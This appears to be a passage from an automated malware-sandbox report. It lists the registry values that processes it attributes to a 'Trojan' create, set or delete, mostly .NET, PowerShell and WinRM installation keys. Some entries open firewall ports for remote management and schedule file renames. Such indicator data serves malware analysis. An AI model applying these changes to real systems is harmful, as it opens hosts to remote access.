"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 F9 76 A4 2A A5 32 61 26 1C E2 5C 98 E3 ED C6"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The process mscorsvw.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 B2 1F 53 3D D3 21 1A 1C 8D 5F B1 30 12 E5 2B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "B0 2A 7B 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F7 85 91 F8 72 08 41 B4 A7 81 57 FD D1 7F 71"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "B8 D9 AA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process wsmanhttpconfig.exe:2848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1E FB 99 AB D1 98 5B F1 41 E5 F0 A0 C2 95 61"
The process wsmanhttpconfig.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 3B F3 8E 75 9B 4E 52 64 19 29 DE 18 03 55 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "70E26930-EA82-4196-BBE8-84FEE19388CD"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
The process MsiExec.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 BC 39 50 6E 71 2E BE A4 74 B8 26 91 7D 39 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MsiExec.exe:2812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 39 89 31 3A 89 13 A9 6A 20 A8 B2 A1 E1 EE E7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 89 FC 43 8E 85 87 7F 91 15 F6 43 7A C1 10 CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2.tmp\mastermind\,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process update.exe:3572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"UpgradeType" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
